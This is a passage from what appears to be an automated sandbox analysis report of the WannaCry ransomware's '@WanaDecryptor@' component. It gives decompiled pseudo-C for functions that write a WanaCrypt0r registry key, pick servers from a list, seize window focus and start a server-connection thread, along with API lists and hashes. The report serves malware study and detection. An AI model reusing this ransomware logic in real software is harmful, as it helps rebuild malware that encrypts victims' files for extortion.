                                  • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                  • RegQueryValueExA.KERNELBASE ref: 00401D81
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
                                  • RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectoryValue$CloseCreateQuerywcscat
                                  • String ID: Software\$WanaCrypt0r
                                  • API String ID: 3883271862-1723423467
                                  • Opcode ID: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                  • Instruction ID: c02b3dbe7123360802e3a7ceba079e11f57c538643229ddb10ed726050e42e59
                                  • Opcode Fuzzy Hash: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                  • Instruction Fuzzy Hash: 5F31C271208341ABD320CF54DC44BEBB7A8FFC4750F404D2EF996A7290D7B4A90987A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BAF0 Relevance: 15.3, APIs: 10, Instructions: 301stringsleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E0040BAF0() {
				signed int _t71;
				signed int _t72;
				void* _t84;
				signed int _t86;
				signed int _t91;
				signed int _t92;
				signed int _t97;
				intOrPtr _t101;
				signed int _t110;
				void* _t113;
				void* _t116;
				signed int _t126;
				char _t129;
				signed int _t131;
				unsigned int _t138;
				signed int _t139;
				char* _t144;
				signed int _t147;
				unsigned int _t152;
				signed int _t153;
				signed int _t158;
				signed int _t160;
				signed int _t161;
				signed int _t169;
				signed int _t172;
				signed int _t173;
				signed int _t181;
				signed int _t191;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				void* _t237;
				char* _t238;
				void* _t240;
				void* _t241;
				intOrPtr* _t242;
				void* _t245;
				intOrPtr* _t246;
				signed int _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				void* _t252;
				void* _t255;
				void* _t256;
				void* _t257;
				void* _t259;
				void* _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_push(0xffffffff);
				_push(E00414286);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t251;
				_t252 = _t251 - 0x47c;
				_t71 = E0040BA10();
				if(_t71 != 0) {
					L31:
					_t72 = _t71 | 0xffffffff;
					__eflags = _t72;
				} else {
					_t131 =  *0x422210; // 0xb7d178
					 *((intOrPtr*)( *_t131 + 0xc))();
					asm("repne scasb");
					_t266 =  !(_t131 | 0xffffffff) == 1;
					if( !(_t131 | 0xffffffff) == 1) {
						L3:
						_t249 = 0;
						 *((char*)(_t252 + 0x14)) =  *((intOrPtr*)(_t252 + 0x13));
						 *((intOrPtr*)(_t252 + 0x18)) = E0040C8F0(0, 0, 0);
						 *(_t252 + 0x1c) = 0;
						asm("repne scasb");
						_t138 =  !(_t252 + 0x0000001c | 0xffffffff);
						_t237 =  *((intOrPtr*)(_t252 + 0x49c)) - _t138;
						 *((intOrPtr*)(_t252 + 0x498)) = 0;
						_t139 = _t138 >> 2;
						memcpy(_t237 + _t139 + _t139, _t237, memcpy(_t252 + 0xa4, _t237, _t139 << 2) & 0x00000003);
						_t255 = _t252 + 0x18;
						_t144 = _t255 + 0xa8;
						_t238 = strtok(_t144, ",;");
						_t256 = _t255 + 8;
						if(_t238 != 0) {
							_t129 =  *((intOrPtr*)(_t256 + 0x13));
							do {
								_t200 = _t249;
								_t249 = _t249 + 1;
								if(_t200 > 0) {
									_t181 = _t256 + 0x28;
									 *(_t256 + 0x28) = _t129;
									E0040C7B0(_t181, 0);
									asm("repne scasb");
									_push( !(_t181 | 0xffffffff) - 1);
									_push(_t238);
									E0040C920(_t256 + 0x2c);
									 *((char*)(_t256 + 0x4a0)) = 1;
									E0040C800(_t256 + 0x24, _t256 + 0x20, _t256 + 0x24,  *((intOrPtr*)(_t256 + 0x18)), _t256 + 0x24);
									_t144 = _t256 + 0x28;
									 *((char*)(_t256 + 0x498)) = 0;
									E0040C7B0(_t144, 1);
								}
								_t238 = strtok(0, ",;");
								_t256 = _t256 + 8;
							} while (_t238 != 0);
						}
						asm("repne scasb");
						_t147 =  !(_t144 | 0xffffffff) - 1;
						if(_t147 == 0) {
							L17:
							_push(_t256 + 0xa4);
							_t84 = E0040BA60(_t277);
							_t256 = _t256 + 4;
							if(_t84 != 0) {
								goto L19;
							} else {
								asm("repne scasb");
								_t172 =  !(_t147 | 0xffffffff);
								_t245 = _t256 + 0xa4 - _t172;
								_t173 = _t172 >> 2;
								memcpy(0x422214, _t245, _t173 << 2);
								_t263 = _t256 + 0xc;
								 *((intOrPtr*)(_t263 + 0x498)) = 0xffffffff;
								_t113 = memcpy(_t245 + _t173 + _t173, _t245, _t172 & 0x00000003);
								_t264 = _t263 + 0xc;
								E0040C860(_t264 + 0x20, _t264 + 0x24,  *_t113,  *((intOrPtr*)(_t256 + 0x18)));
								_push( *((intOrPtr*)(_t264 + 0x18)));
								L00412C98();
								_t252 = _t264 + 4;
								_t72 = 0;
							}
						} else {
							_t246 = _t256 + 0xa4;
							_t116 = 0x422214;
							while(1) {
								_t198 =  *_t116;
								_t147 = _t198;
								if(_t198 !=  *_t246) {
									break;
								}
								if(_t147 == 0) {
									L14:
									_t116 = 0;
								} else {
									_t24 = _t116 + 1; // 0x0
									_t199 =  *_t24;
									_t147 = _t199;
									if(_t199 !=  *((intOrPtr*)(_t246 + 1))) {
										break;
									} else {
										_t116 = _t116 + 2;
										_t246 = _t246 + 2;
										if(_t147 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								L16:
								_t277 = _t116;
								if(_t116 == 0) {
									L19:
									srand(GetTickCount());
									_t86 =  *(_t256 + 0x20);
									_t257 = _t256 + 4;
									__eflags = _t86;
									if(_t86 <= 0) {
										L30:
										 *((intOrPtr*)(_t257 + 0x494)) = 0xffffffff;
										_t71 = E0040C860(_t257 + 0x20, _t257 + 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18)))),  *((intOrPtr*)(_t257 + 0x18)));
										_push( *((intOrPtr*)(_t257 + 0x18)));
										L00412C98();
										_t252 = _t257 + 4;
										goto L31;
									} else {
										do {
											_t191 = rand() % _t86;
											_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18))));
											__eflags = _t191;
											_t91 = _t191;
											if(_t191 > 0) {
												_t91 = 0;
												__eflags = 0;
												do {
													_t250 =  *_t250;
													_t191 = _t191 - 1;
													__eflags = _t191;
												} while (_t191 != 0);
											}
											__eflags = _t91;
											if(_t91 < 0) {
												_t110 =  ~_t91;
												do {
													_t250 =  *((intOrPtr*)(_t250 + 4));
													_t110 = _t110 - 1;
													__eflags = _t110;
												} while (_t110 != 0);
											}
											_t92 =  *(_t250 + 0xc);
											_t42 = _t250 + 8; // 0x8
											_t126 = _t42;
											__eflags = _t92;
											if(__eflags == 0) {
												_t92 = 0x41ba38;
											}
											asm("repne scasb");
											_t152 =  !(_t147 | 0xffffffff);
											_t240 = _t92 - _t152;
											_t153 = _t152 >> 2;
											memcpy(_t240 + _t153 + _t153, _t240, memcpy(_t257 + 0x40, _t240, _t153 << 2) & 0x00000003);
											_t259 = _t257 + 0x18;
											_t158 = _t259 + 0x40;
											_push(_t158);
											_t97 = E0040BA60(__eflags);
											_t260 = _t259 + 4;
											__eflags = _t97;
											if(_t97 == 0) {
												 *((intOrPtr*)(_t260 + 0x494)) = 0xffffffff;
												asm("repne scasb");
												_t160 =  !(_t158 | 0xffffffff);
												_t241 = _t260 + 0x40 - _t160;
												_t161 = _t160 >> 2;
												memcpy(0x422214, _t241, _t161 << 2);
												memcpy(_t241 + _t161 + _t161, _t241, _t160 & 0x00000003);
												_t262 = _t260 + 0x18;
												_t242 =  *((intOrPtr*)(_t262 + 0x18));
												_t101 =  *_t242;
												__eflags = _t101 - _t242;
												 *((intOrPtr*)(_t262 + 0x20)) = _t101;
												if(_t101 != _t242) {
													do {
														_push(0);
														E0040C740(_t262 + 0x1c, _t262 + 0x3c,  *((intOrPtr*)(E00402D90(_t262 + 0x28, _t262 + 0x38))));
														__eflags =  *((intOrPtr*)(_t262 + 0x20)) - _t242;
													} while ( *((intOrPtr*)(_t262 + 0x20)) != _t242);
												}
												_push( *((intOrPtr*)(_t262 + 0x18)));
												L00412C98();
												_t252 = _t262 + 4;
												_t72 = 0;
											} else {
												goto L29;
											}
											goto L32;
											L29:
											_t169 =  *0x422210; // 0xb7d178
											 *((intOrPtr*)( *_t169 + 0xc))();
											 *((intOrPtr*)( *((intOrPtr*)(_t250 + 4)))) =  *_t250;
											_t147 = _t126;
											 *((intOrPtr*)( *_t250 + 4)) =  *((intOrPtr*)(_t250 + 4));
											E0040CE50(_t147, 0);
											_push(_t250);
											L00412C98();
											_t257 = _t260 + 4;
											 *((intOrPtr*)(_t257 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) - 1;
											Sleep(0xbb8); // executed
											_t86 =  *(_t257 + 0x1c);
											__eflags = _t86;
										} while (_t86 > 0);
										goto L30;
									}
								} else {
									goto L17;
								}
								goto L32;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L16;
						}
					} else {
						_push(0x422214);
						_t72 = E0040BA60(_t266);
						_t252 = _t252 + 4;
						if(_t72 != 0) {
							goto L3;
						}
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t252 + 0x48c));
				return _t72;
			}





















































                                  0x0040baf6
                                  0x0040baf8
                                  0x0040bafd
                                  0x0040bafe
                                  0x0040bb05
                                  0x0040bb0f
                                  0x0040bb16
                                  0x0040bdf5
                                  0x0040bdf5
                                  0x0040bdf5
                                  0x0040bb1c
                                  0x0040bb1c
                                  0x0040bb24
                                  0x0040bb31
                                  0x0040bb35
                                  0x0040bb36
                                  0x0040bb4d
                                  0x0040bb51
                                  0x0040bb53
                                  0x0040bb62
                                  0x0040bb66
                                  0x0040bb7d
                                  0x0040bb7f
                                  0x0040bb8a
                                  0x0040bb8e
                                  0x0040bb95
                                  0x0040bb9f
                                  0x0040bb9f
                                  0x0040bba1
                                  0x0040bbae
                                  0x0040bbb0
                                  0x0040bbb5
                                  0x0040bbb7
                                  0x0040bbbb
                                  0x0040bbbb
                                  0x0040bbbd
                                  0x0040bbc0
                                  0x0040bbc4
                                  0x0040bbc8
                                  0x0040bbcc
                                  0x0040bbd8
                                  0x0040bbdd
                                  0x0040bbde
                                  0x0040bbe3
                                  0x0040bbfb
                                  0x0040bc03
                                  0x0040bc0a
                                  0x0040bc0e
                                  0x0040bc16
                                  0x0040bc16
                                  0x0040bc27
                                  0x0040bc29
                                  0x0040bc2c
                                  0x0040bbbb
                                  0x0040bc3a
                                  0x0040bc3e
                                  0x0040bc3f
                                  0x0040bc7e
                                  0x0040bc85
                                  0x0040bc86
                                  0x0040bc8b
                                  0x0040bc90
                                  0x00000000
                                  0x0040bc92
                                  0x0040bc9c
                                  0x0040bc9e
                                  0x0040bca8
                                  0x0040bcb0
                                  0x0040bcb3
                                  0x0040bcb3
                                  0x0040bcb7
                                  0x0040bcc5
                                  0x0040bcc5
                                  0x0040bcd3
                                  0x0040bcdc
                                  0x0040bcdd
                                  0x0040bce2
                                  0x0040bce5
                                  0x0040bce5
                                  0x0040bc41
                                  0x0040bc41
                                  0x0040bc48
                                  0x0040bc4d
                                  0x0040bc4d
                                  0x0040bc51
                                  0x0040bc55
                                  0x00000000
                                  0x00000000
                                  0x0040bc59
                                  0x0040bc71
                                  0x0040bc71
                                  0x0040bc5b
                                  0x0040bc5b
                                  0x0040bc5b
                                  0x0040bc61
                                  0x0040bc65
                                  0x00000000
                                  0x0040bc67
                                  0x0040bc67
                                  0x0040bc6a
                                  0x0040bc6f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040bc6f
                                  0x0040bc65
                                  0x0040bc7a
                                  0x0040bc7a
                                  0x0040bc7c
                                  0x0040bcec
                                  0x0040bcf3
                                  0x0040bcf8
                                  0x0040bcfc
                                  0x0040bcff
                                  0x0040bd01
                                  0x0040bdc7
                                  0x0040bdcb
                                  0x0040bde3
                                  0x0040bdec
                                  0x0040bded
                                  0x0040bdf2
                                  0x00000000
                                  0x0040bd07
                                  0x0040bd07
                                  0x0040bd10
                                  0x0040bd16
                                  0x0040bd18
                                  0x0040bd1a
                                  0x0040bd1c
                                  0x0040bd1e
                                  0x0040bd1e
                                  0x0040bd20
                                  0x0040bd20
                                  0x0040bd23
                                  0x0040bd23
                                  0x0040bd23
                                  0x0040bd20
                                  0x0040bd26
                                  0x0040bd28
                                  0x0040bd2a
                                  0x0040bd2c
                                  0x0040bd2c
                                  0x0040bd2f
                                  0x0040bd2f
                                  0x0040bd2f
                                  0x0040bd2c
                                  0x0040bd32
                                  0x0040bd35
                                  0x0040bd35
                                  0x0040bd38
                                  0x0040bd3a
                                  0x0040bd3c
                                  0x0040bd3c
                                  0x0040bd4c
                                  0x0040bd4e
                                  0x0040bd54
                                  0x0040bd58
                                  0x0040bd62
                                  0x0040bd62
                                  0x0040bd64
                                  0x0040bd68
                                  0x0040bd69
                                  0x0040bd6e
                                  0x0040bd71
                                  0x0040bd73
                                  0x0040be1a
                                  0x0040be25
                                  0x0040be27
                                  0x0040be2d
                                  0x0040be34
                                  0x0040be37
                                  0x0040be3e
                                  0x0040be3e
                                  0x0040be40
                                  0x0040be44
                                  0x0040be46
                                  0x0040be48
                                  0x0040be4c
                                  0x0040be4e
                                  0x0040be52
                                  0x0040be6a
                                  0x0040be6f
                                  0x0040be6f
                                  0x0040be4e
                                  0x0040be79
                                  0x0040be7a
                                  0x0040be7f
                                  0x0040be82
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040bd79
                                  0x0040bd79
                                  0x0040bd81
                                  0x0040bd8c
                                  0x0040bd94
                                  0x0040bd96
                                  0x0040bd99
                                  0x0040bd9e
                                  0x0040bd9f
                                  0x0040bda8
                                  0x0040bdb1
                                  0x0040bdb5
                                  0x0040bdbb
                                  0x0040bdbf
                                  0x0040bdbf
                                  0x00000000
                                  0x0040bd07
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040bc7c
                                  0x0040bc75
                                  0x0040bc77
                                  0x00000000
                                  0x0040bc77
                                  0x0040bb38
                                  0x0040bb38
                                  0x0040bb3d
                                  0x0040bb42
                                  0x0040bb47
                                  0x00000000
                                  0x00000000
                                  0x0040bb47
                                  0x0040bb36
                                  0x0040bdf8
                                  0x0040be03
                                  0x0040be10

                                  APIs
                                  • strtok.MSVCRT ref: 0040BBA9
                                  • strtok.MSVCRT ref: 0040BC22
                                  • #825.MFC42(?,?), ref: 0040BCDD
                                  • GetTickCount.KERNEL32 ref: 0040BCEC
                                  • srand.MSVCRT ref: 0040BCF3
                                  • rand.MSVCRT ref: 0040BD09
                                  • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
                                  • Sleep.KERNELBASE(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
                                  • #825.MFC42(?,?,?,?), ref: 0040BDED
                                    • Part of subcall function 0040C860: #825.MFC42(?,00000000,0019FA30,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
                                  • #825.MFC42(?), ref: 0040BE7A
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825$strtok$CountSleepTickrandsrand
                                  • String ID:
                                  • API String ID: 1749417438-0
                                  • Opcode ID: 96e699f875d8ec980aa85d24ffdf4feb71e75c823abe6f95846dbf914e7e69aa
                                  • Instruction ID: 15ce6157e9eadcb8372a8ba3d428bceb52ebc69e02ab62c17c692bc1e2f98a80
                                  • Opcode Fuzzy Hash: 96e699f875d8ec980aa85d24ffdf4feb71e75c823abe6f95846dbf914e7e69aa
                                  • Instruction Fuzzy Hash: 48A102716082059BC724DF34C841AABB7D4EF95314F044A3EF99AA73D1EB78D908C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004085C0 Relevance: 13.6, APIs: 9, Instructions: 75COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E004085C0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				long _v20;
				void _v24;
				intOrPtr _v28;
				int _t33;
				intOrPtr _t50;
				long _t53;
				intOrPtr _t55;

				_push(0xffffffff);
				_push(E00413FF3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				_t50 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x4157f0;
				_v4 = 0;
				L00412F74();
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x80)) = 0;
				_v4 = 1;
				 *((intOrPtr*)(__ecx)) = 0x4161a4;
				 *((intOrPtr*)(_t50 + 0x58)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t50 + 0x60)) = GetSysColor(9);
				 *((intOrPtr*)(_t50 + 0x64)) = GetSysColor(0x12);
				_t53 = GetSysColor(2);
				_v20 = _t53;
				_v24 = 0;
				_t33 = SystemParametersInfoA(0x1008, 0,  &_v24, 0); // executed
				if(_t33 != 0 && _v24 != 0) {
					_t53 = GetSysColor(0x1b);
				}
				_push(0xffffffff);
				_push(2);
				L00412F50();
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)))) = _v28;
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)) + 4)) = _t53;
				 *((intOrPtr*)(_t50 + 0x70)) = 0xa;
				 *((intOrPtr*)(_t50 + 0x68)) = 0;
				 *((intOrPtr*)(_t50 + 0x6c)) = 0x28;
				 *((intOrPtr*)(_t50 + 0x54)) = 0;
				 *((intOrPtr*)(_t50 + 0x5c)) = 0;
				 *[fs:0x0] = _v20;
				return _t50;
			}












                                  0x004085c0
                                  0x004085c2
                                  0x004085cd
                                  0x004085ce
                                  0x004085db
                                  0x004085de
                                  0x004085e2
                                  0x004085e7
                                  0x004085f2
                                  0x004085f6
                                  0x00408601
                                  0x00408604
                                  0x00408607
                                  0x0040860a
                                  0x00408612
                                  0x00408617
                                  0x00408621
                                  0x00408628
                                  0x0040862f
                                  0x00408634
                                  0x00408642
                                  0x00408646
                                  0x0040864a
                                  0x00408652
                                  0x0040865e
                                  0x0040865e
                                  0x00408660
                                  0x00408662
                                  0x00408667
                                  0x00408674
                                  0x0040867d
                                  0x00408680
                                  0x00408687
                                  0x0040868a
                                  0x00408691
                                  0x00408694
                                  0x0040869c
                                  0x004086a6

                                  APIs
                                  • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                  • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                  • GetSysColor.USER32 ref: 0040861D
                                  • GetSysColor.USER32(00000009), ref: 00408624
                                  • GetSysColor.USER32(00000012), ref: 0040862B
                                  • GetSysColor.USER32(00000002), ref: 00408632
                                  • KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                  • GetSysColor.USER32(0000001B), ref: 0040865C
                                  • #6140.MFC42(00000002,000000FF), ref: 00408667
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Color$#341#567#6140CallbackDispatcherUser
                                  • String ID:
                                  • API String ID: 2603677082-0
                                  • Opcode ID: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                  • Instruction ID: 8505b43e8b24dba0e9a20122b4cf5018a120a2575fdff98832e5101b57525ea5
                                  • Opcode Fuzzy Hash: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                  • Instruction Fuzzy Hash: 7D2159B0900B449FD320DF2AC985B96FBE4FF84B14F504A2FE19687791D7B9A844CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B620 Relevance: 13.5, APIs: 9, Instructions: 45windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B620(WCHAR* _a4, struct HWND__* _a8) {
				struct HWND__* _t4;
				struct HWND__* _t15;

				_t4 = FindWindowW(0, _a4); // executed
				_t15 = _t4;
				if(_t15 != 0) {
					ShowWindow(_t15, 5); // executed
					SetWindowPos(_t15, 0xffffffff, 0, 0, 0, 0, 0x43);
					SetWindowPos(_t15, 0xfffffffe, 0, 0, 0, 0, 0x43);
					SetForegroundWindow(_t15); // executed
					SetFocus(_t15);
					SetActiveWindow(_t15);
					BringWindowToTop(_t15);
					_t4 = _a8;
					if(_t4 != 0) {
						ExitProcess(0);
					}
				}
				return _t4;
			}





                                  0x0040b628
                                  0x0040b62e
                                  0x0040b632
                                  0x0040b638
                                  0x0040b651
                                  0x0040b660
                                  0x0040b663
                                  0x0040b66a
                                  0x0040b671
                                  0x0040b678
                                  0x0040b67e
                                  0x0040b685
                                  0x0040b689
                                  0x0040b689
                                  0x0040b685
                                  0x0040b690

                                  APIs
                                  • FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                  • ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                  • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                  • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                  • KiUserCallbackDispatcher.NTDLL(00000000), ref: 0040B663
                                  • SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                  • SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                  • BringWindowToTop.USER32(00000000), ref: 0040B678
                                  • ExitProcess.KERNEL32 ref: 0040B689
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$ActiveBringCallbackDispatcherExitFindFocusProcessShowUser
                                  • String ID:
                                  • API String ID: 3379167612-0
                                  • Opcode ID: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                  • Instruction ID: 32f88169c1f0d7c0e12a36757c7a64a26434f73f58f3758d5628eaed19e7f987
                                  • Opcode Fuzzy Hash: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                  • Instruction Fuzzy Hash: 66F0F431245A21F7E2315B54AC0DFDF3655DFC5B21F214610F715791D4CB6455018AAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401140 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowtimethreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E00401140() {
				intOrPtr _v4;
				void* _t16;
				void* _t17;
				struct HWND__* _t18;
				void* _t23;
				intOrPtr _t24;

				_t23 = _t17;
				L00412CB0();
				SendMessageA( *(_t23 + 0x80), 0x404, 1, 0);
				_t18 =  *(_t23 + 0x80);
				SendMessageA(_t18, 0x401, 0, 0x280000);
				_push(_t18);
				 *((intOrPtr*)(_t23 + 0xb0)) = 0x1e;
				_v4 = _t24;
				L00412CAA();
				E00401970("Connecting to server...");
				 *(_t23 + 0xa8) = 0;
				SetTimer( *(_t23 + 0x20), 0x3e9, 0x3e8, 0); // executed
				if( *((intOrPtr*)(_t23 + 0xa0)) != 0) {
					_t16 = CreateThread(0, 0, E004012D0, _t23, 0, 0); // executed
					 *(_t23 + 0xac) = _t16;
				}
				return 1;
			}









                                  0x00401143
                                  0x00401145
                                  0x00401160
                                  0x00401162
                                  0x00401175
                                  0x00401177
                                  0x00401178
                                  0x00401184
                                  0x0040118d
                                  0x00401194
                                  0x004011a9
                                  0x004011b3
                                  0x004011c1
                                  0x004011d1
                                  0x004011d7
                                  0x004011d7
                                  0x004011e5

                                  APIs
                                  • #4710.MFC42 ref: 00401145
                                  • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
                                  • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
                                  • #537.MFC42(Connecting to server...), ref: 0040118D
                                    • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                    • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                    • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                  • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000012D0,?,00000000,00000000), ref: 004011D1
                                  Strings
                                  • Connecting to server..., xrefs: 00401188
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092#4710#537#6199#800CreateThreadTimer
                                  • String ID: Connecting to server...
                                  • API String ID: 3305248171-1849848738
                                  • Opcode ID: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                  • Instruction ID: 074e0af6858d04fd3a88c2e6ba563778cf6a67133e9310fa302bc50ac74eac6c
                                  • Opcode Fuzzy Hash: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                  • Instruction Fuzzy Hash: 480175B0390700BBE2305B66CC46F8BB694AF84B50F10851EF349AA2D0CAF474018B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401220 Relevance: 10.6, APIs: 7, Instructions: 53windowtimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00401220(void* __ecx, long _a4) {
				long _t11;
				void* _t26;

				_t11 = _a4;
				_t26 = __ecx;
				if(_t11 != 0x3e9) {
					L8:
					L00412CBC();
					return _t11;
				}
